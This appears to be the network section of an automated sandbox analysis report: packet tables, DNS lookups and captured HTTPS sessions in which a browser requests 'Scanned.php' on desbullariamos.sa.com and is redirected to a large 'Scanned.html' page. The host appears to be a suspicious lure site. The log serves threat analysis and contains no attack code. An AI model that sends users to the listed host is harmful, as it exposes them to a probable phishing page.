Dec 20, 2024 18:11:33.833404064 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.833429098 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.833482027 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.833503962 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.886253119 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.906536102 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.906547070 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.906569004 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:33.906609058 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:33.906661034 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.051145077 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.051167965 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.051187038 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.051220894 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.051318884 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.076503992 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.076524973 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.076541901 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.076570034 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.076621056 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.109724045 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.109743118 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.109822035 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.129640102 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.129659891 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.129715919 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.236565113 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.236596107 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.236651897 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.236706972 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.253253937 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.253349066 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.277606964 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.277707100 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.294711113 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.294810057 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.304639101 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.304721117 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.317161083 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.317248106 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.326709032 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.326792955 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.336488008 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.336571932 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.429476023 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.429605007 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.437295914 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.437381029 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.449033976 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.449116945 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.457279921 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.457365036 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.465256929 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.465334892 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.474456072 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.474536896 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.481687069 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.481765985 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.488493919 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.488576889 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.493506908 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.493580103 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.500245094 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.500318050 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.504777908 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.504935026 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.511286974 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.511373997 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.516216993 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.516294003 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.521250010 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.521327019 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.637027025 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.637135029 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.640149117 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.640239000 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.644396067 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.644500017 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.648046017 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.648122072 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.653096914 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.653184891 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.657248974 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.657339096 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.660968065 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.661037922 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.665956020 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.666039944 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.669739962 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.669814110 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.673777103 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.673857927 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.678133965 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.678205013 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.682450056 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.682620049 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.685897112 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.685972929 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.690879107 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.690953016 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.713128090 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.713264942 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.740688086 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.740883112 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.814593077 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.814688921 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.814802885 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.814802885 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.815556049 CET	49757	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.815578938 CET	443	49757	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.914586067 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:34.914613008 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:34.917068005 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:34.917273045 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:34.917283058 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:34.917907953 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.918209076 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.918236971 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.918939114 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.921627998 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:34.921714067 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:11:34.963641882 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:11:35.244966030 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:35.245011091 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:35.245270014 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:35.245558023 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:35.245589972 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:36.943157911 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:36.943485975 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:36.943510056 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:36.944452047 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:36.944523096 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:36.945892096 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:36.945955992 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:36.993530989 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:36.993561983 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:37.040396929 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:37.403160095 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.403479099 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.403505087 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.405175924 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.405250072 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.406466961 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.406562090 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.406681061 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.447334051 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.462133884 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.462153912 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.509099960 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.732862949 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.732944012 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.732965946 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.733007908 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.733102083 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.733102083 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.733122110 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.733134985 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.733149052 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.733201981 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.733783007 CET	49774	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.733795881 CET	443	49774	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.876441002 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.876466990 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:37.876580954 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.876945019 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:37.876955032 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.176002026 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.176263094 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.176270008 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.179589987 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.179656982 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.180069923 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.180143118 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.180247068 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.180252075 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.228208065 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.675343990 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.675399065 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.675419092 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.675465107 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.675472975 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.675501108 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.675566912 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:39.675630093 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.676521063 CET	49780	443	192.168.2.5	68.183.112.81
Dec 20, 2024 18:11:39.676527977 CET	443	49780	68.183.112.81	192.168.2.5
Dec 20, 2024 18:11:46.579643011 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:46.579693079 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:11:46.579760075 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:47.042890072 CET	49771	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:11:47.042943001 CET	443	49771	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:19.931463003 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:12:19.931477070 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:12:34.839271069 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:34.839380026 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:34.839461088 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:34.839773893 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:34.839811087 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:35.042483091 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:12:35.042695045 CET	443	49765	172.93.120.113	192.168.2.5
Dec 20, 2024 18:12:35.042773962 CET	49765	443	192.168.2.5	172.93.120.113
Dec 20, 2024 18:12:36.538667917 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:36.539370060 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:36.539457083 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:36.540179014 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:36.540481091 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:36.540575981 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:36.587733984 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:46.259217024 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:46.259325027 CET	443	49916	172.217.19.228	192.168.2.5
Dec 20, 2024 18:12:46.259797096 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:47.045183897 CET	49916	443	192.168.2.5	172.217.19.228
Dec 20, 2024 18:12:47.045263052 CET	443	49916	172.217.19.228	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 18:11:17.894681931 CET	49754	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:30.168417931 CET	50540	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:30.168541908 CET	61816	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:30.302697897 CET	53	52008	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:30.327408075 CET	53	59766	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:30.826427937 CET	53	50540	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:30.827193975 CET	53	61816	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:33.948096991 CET	53	57424	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:34.774702072 CET	60234	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:34.774970055 CET	63064	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:34.912969112 CET	53	60234	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:34.913466930 CET	53	63064	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:34.913614035 CET	50937	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:34.913738012 CET	51827	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:35.080980062 CET	53	61867	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:35.243688107 CET	53	50937	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:35.244450092 CET	53	51827	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:37.738054037 CET	49923	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:37.738177061 CET	52425	53	192.168.2.5	1.1.1.1
Dec 20, 2024 18:11:37.875782013 CET	53	49923	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:37.875829935 CET	53	52425	1.1.1.1	192.168.2.5
Dec 20, 2024 18:11:50.884423018 CET	53	51072	1.1.1.1	192.168.2.5
Dec 20, 2024 18:12:09.835216999 CET	53	60395	1.1.1.1	192.168.2.5
Dec 20, 2024 18:12:30.231544971 CET	53	61092	1.1.1.1	192.168.2.5
Dec 20, 2024 18:12:32.163760900 CET	53	53341	1.1.1.1	192.168.2.5
Dec 20, 2024 18:13:02.963790894 CET	53	65152	1.1.1.1	192.168.2.5
Dec 20, 2024 18:13:49.084351063 CET	53	65170	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 18:11:17.894681931 CET	192.168.2.5	1.1.1.1	0xdc64	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:30.168417931 CET	192.168.2.5	1.1.1.1	0xf839	Standard query (0)	desbullariamos.sa.com	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:30.168541908 CET	192.168.2.5	1.1.1.1	0xcf21	Standard query (0)	desbullariamos.sa.com	65	IN (0x0001)	false
Dec 20, 2024 18:11:34.774702072 CET	192.168.2.5	1.1.1.1	0x61b4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:34.774970055 CET	192.168.2.5	1.1.1.1	0xc85b	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 20, 2024 18:11:34.913614035 CET	192.168.2.5	1.1.1.1	0xc34f	Standard query (0)	winaero.com	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:34.913738012 CET	192.168.2.5	1.1.1.1	0x902a	Standard query (0)	winaero.com	65	IN (0x0001)	false
Dec 20, 2024 18:11:37.738054037 CET	192.168.2.5	1.1.1.1	0xf6a	Standard query (0)	winaero.com	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:37.738177061 CET	192.168.2.5	1.1.1.1	0x49ed	Standard query (0)	winaero.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 18:11:18.126071930 CET	1.1.1.1	192.168.2.5	0xdc64	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 18:11:23.289381027 CET	1.1.1.1	192.168.2.5	0x524a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:23.289381027 CET	1.1.1.1	192.168.2.5	0x524a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:30.826427937 CET	1.1.1.1	192.168.2.5	0xf839	No error (0)	desbullariamos.sa.com		172.93.120.113	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:34.912969112 CET	1.1.1.1	192.168.2.5	0x61b4	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:34.913466930 CET	1.1.1.1	192.168.2.5	0xc85b	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 20, 2024 18:11:35.243688107 CET	1.1.1.1	192.168.2.5	0xc34f	No error (0)	winaero.com		68.183.112.81	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:11:37.875782013 CET	1.1.1.1	192.168.2.5	0xf6a	No error (0)	winaero.com		68.183.112.81	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:13:18.039597988 CET	1.1.1.1	192.168.2.5	0x6e2c	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:13:18.039597988 CET	1.1.1.1	192.168.2.5	0x6e2c	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:14:04.086554050 CET	1.1.1.1	192.168.2.5	0x848a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 20, 2024 18:14:04.086554050 CET	1.1.1.1	192.168.2.5	0x848a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

desbullariamos.sa.com

https:

winaero.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49756	172.93.120.113	443	4440	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 17:11:32 UTC	675	OUT	GET /Scanned.php HTTP/1.1 Host: desbullariamos.sa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 17:11:33 UTC	159	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 17:11:32 GMT Server: Apache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-12-20 17:11:33 UTC	205	IN	Data Raw: 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 64 65 73 62 75 6c 6c 61 72 69 61 6d 6f 73 2e 73 61 2e 63 6f 6d 2f 53 63 61 6e 6e 65 64 2e 68 74 6d 6c 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: c2<!DOCTYPE HTML><html lang="en-US"><head><meta charset="UTF-8"><meta http-equiv="refresh" content="0; url=https://desbullariamos.sa.com/Scanned.html" /></head><body></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49757	172.93.120.113	443	4440	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 17:11:33 UTC	715	OUT	GET /Scanned.html HTTP/1.1 Host: desbullariamos.sa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://desbullariamos.sa.com/Scanned.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 17:11:33 UTC	208	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 17:11:33 GMT Server: Apache Last-Modified: Fri, 20 Dec 2024 09:40:09 GMT Accept-Ranges: bytes Content-Length: 359424 Connection: close Content-Type: text/html
